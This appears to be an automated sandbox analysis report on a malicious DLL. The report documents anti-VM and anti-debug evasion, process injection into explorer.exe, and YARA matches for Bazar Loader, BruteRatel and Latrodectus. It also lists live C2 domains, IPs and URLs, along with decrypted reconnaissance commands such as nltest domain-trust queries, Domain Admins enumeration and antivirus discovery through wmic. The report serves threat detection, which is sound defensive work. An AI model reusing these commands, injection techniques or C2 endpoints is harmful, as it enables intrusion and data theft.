Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	23_2_0000029F3B904D00
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	30_2_089D8424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	30_2_089D7274

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 1756	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8119	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 566
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3224
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5848
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 883

Found evasive API chain checking for process token information

Source: C:\Windows\System32\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll64.exe TID: 1356	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep count: 1756 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep time: -105360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep count: 8119 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep time: -487140000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8172	Thread sleep count: 566 > 30
Source: C:\Windows\explorer.exe TID: 8172	Thread sleep time: -56600s >= -30000s
Source: C:\Windows\explorer.exe TID: 8164	Thread sleep count: 3224 > 30
Source: C:\Windows\explorer.exe TID: 8164	Thread sleep time: -3224000s >= -30000s
Source: C:\Windows\explorer.exe TID: 8164	Thread sleep count: 5848 > 30
Source: C:\Windows\explorer.exe TID: 8164	Thread sleep time: -5848000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\explorer.exe	Code function: 30_2_089DA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,		30_2_089DA8E0
Source: C:\Windows\explorer.exe	Code function: 30_2_089D2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,		30_2_089D2B28

Source: C:\Windows\System32\loaddll64.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000001E.00000000.1578935505.000000000888E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: explorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWe
Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: explorer.exe, 0000001E.00000003.2292493778.0000000008979000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00`
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\rundll32.exe

API call chain: ExitProcess graph end node

Checks if the current process is being debugged

Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\rundll32.exe

Code function: 23_2_0000029F3B8ECCE0 LdrGetProcedureAddress,

23_2_0000029F3B8ECCE0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00000001800402A0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004A5BC GetProcessHeap,

3_2_000000018004A5BC

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		3_2_00000001800402A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		3_2_000000018005C2BC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 82.115.223.39 8041	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 443
Source: C:\Windows\System32\rundll32.exe	Network Connect: 80.78.24.30 8041	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory allocated: C:\Windows\explorer.exe base: 89D0000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_00007DF49BA40100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,		23_3_00007DF49BA40100
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,		23_2_0000000273F41380

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread created: C:\Windows\explorer.exe EIP: 89D0000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 89D0000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe

Memory written: PID: 3504 base: 89D0000 value: 4D

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7468			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7468			Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 7468 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 89D0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1

Jump to behavior

Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584248652.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000002.2567357911.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanq

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_0000000180053038
Source: C:\Windows\System32\rundll32.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	3_2_0000000180052534
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_0000000180052904
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_00000001800529D4
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	3_2_0000000180048A24
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_0000000180047A78
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_0000000180047BBC
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_0000000180047C44
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0000000180052E38

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180048AB4 GetSystemTimeAsFileTime,

3_2_0000000180048AB4

Source: C:\Windows\System32\rundll32.exe

Code function: 23_2_0000029F3B904D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

23_2_0000029F3B904D00

Source: C:\Windows\explorer.exe

Code function: 30_2_089E00E8 RtlGetVersion,

30_2_089E00E8

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Adds / modifies Windows certificates

Source: C:\Windows\System32\rundll32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Jump to behavior

Stealing of Sensitive Information

Yara detected Bazar Loader

Source: Yara match	File source: 23.2.rundll32.exe.29f3b750000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.29f3b6b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.29f3b750000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BruteRatel

Source: Yara match	File source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
Source: Yara match	File source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Latrodectus

Source: Yara match	File source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3504, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Bazar Loader

Source: Yara match	File source: 23.2.rundll32.exe.29f3b750000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.29f3b6b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.29f3b750000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BruteRatel

Source: Yara match	File source: 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
Source: Yara match	File source: 00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Latrodectus

Source: Yara match	File source: 0000001E.00000002.2587836163.0000000008AAC000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3504, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.3	isomicrotich.com	European Union	13335	CLOUDFLARENETUS	true
82.115.223.39	greshunka.com	Russian Federation	209821	MIDNET-ASTK-TelecomRU	true
80.78.24.30	tiguanin.com	Cyprus	37560	CYBERDYNELR	true

Contacted Domains

Name	IP	Active
isomicrotich.com	188.114.96.3	true
greshunka.com	82.115.223.39	true
tiguanin.com	80.78.24.30	true
bazarunet.com	80.78.24.30	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://isomicrotich.com/test/	true		unknown
https://opewolumeras.com/test/	true		unknown

AV Detection

Found malware configuration

Source: 30.2.explorer.exe.89d0000.0.raw.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c ipconfig /all
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c systeminfo
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c nltest /domain_trusts
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c net view /all
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c net view /all /domain
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &ipconfig=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c net config workstation
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: /c whoami /groups
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &systeminfo=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &domain_trusts=
Source: 30.2.explorer.exe.89d0000.0.raw.unpack	String decryptor: &domain_trusts_all=
